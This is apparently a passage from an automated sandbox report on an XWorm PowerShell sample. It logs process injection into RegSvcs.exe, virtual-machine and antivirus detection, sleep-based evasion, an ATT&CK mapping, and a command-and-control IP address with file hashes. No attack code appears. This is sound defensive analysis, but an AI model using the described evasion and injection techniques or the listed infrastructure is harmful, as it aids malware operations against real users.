            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4160Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3140Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2639Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7204Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: RegSvcs.exe, 00000004.00000002.4599997766.000000000107C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B54008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegSvcs.exe, 00000004.00000002.4599997766.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4599997766.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5916, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5916, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		211
            Process Injection            		1
            Disable or Modify Tools            		OS Credential Dumping121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		121
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
            Process Injection            		Security Account Manager121
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            176.113.115.170.ps111%ReversingLabsWin32.Trojan.Generic
            176.113.115.170.ps110%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            176.113.115.1700%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            18.31.95.13.in-addr.arpa
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              176.113.115.170true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/pscore68powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    176.113.115.170
                                    		unknownRussian Federation
                                    		49505SELECTELRUtrue

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1589116
                                    Start date and time:2025-01-11 10:02:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 24s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:176.113.115.170.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@4/5@1/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 17
                                    • Number of non-executed functions: 8
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 13.95.31.18, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 5916 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6212 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    04:03:05API Interceptor8x Sleep call for process: powershell.exe modified
                                    04:03:08API Interceptor9645329x Sleep call for process: RegSvcs.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    176.113.115.170iy2.dat.exeGet hashmaliciousXWormBrowse
                                      176.113.115_1.170.ps1Get hashmaliciousXWormBrowse

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        SELECTELRUb0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        1In8uYbvZJ.ps1Get hashmaliciousUnknownBrowse
                                        • 176.113.115.177
                                        xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                        • 176.113.115.19
                                        nYT1CaXH9N.ps1Get hashmaliciousAmadeyBrowse
                                        • 176.113.115.131

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1628158735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllul5mxllp:NllU4x/
                                        MD5:3A925CB766CE4286E251C26E90B55CE8
                                        SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                        SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                        SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jsey4b5.4gm.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wef4roxy.0ja.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7302356953824454
                                        Encrypted:false
                                        SSDEEP:48:EByDC0lgtrt3CyeU2UG/rukvhkvklCyw/xWlflHJb7SogZobRWlflub7SogZo31:rCRt3C8ThkvhkvCCt5Wlf+H2WlfzHc
                                        MD5:A4DA0F2125ECFDDB82AB308E616BB28B
                                        SHA1:8F45BC05113502D762F3A8C4B9BD1ABEC2D85F68
                                        SHA-256:975E09B64E375693C938A0B796B5BC0178FAC12CF9CD319C16E3A325B8D8A871
                                        SHA-512:9F41857FA5A94A2468C4770E3F444E8C42CAC5A37A370CF60006D0F23955BB3E806ACF59FEE6D0806A4A631938579A5B1649BBDC1E69BE8313BCBCFD6B6BE734
                                        Malicious:false
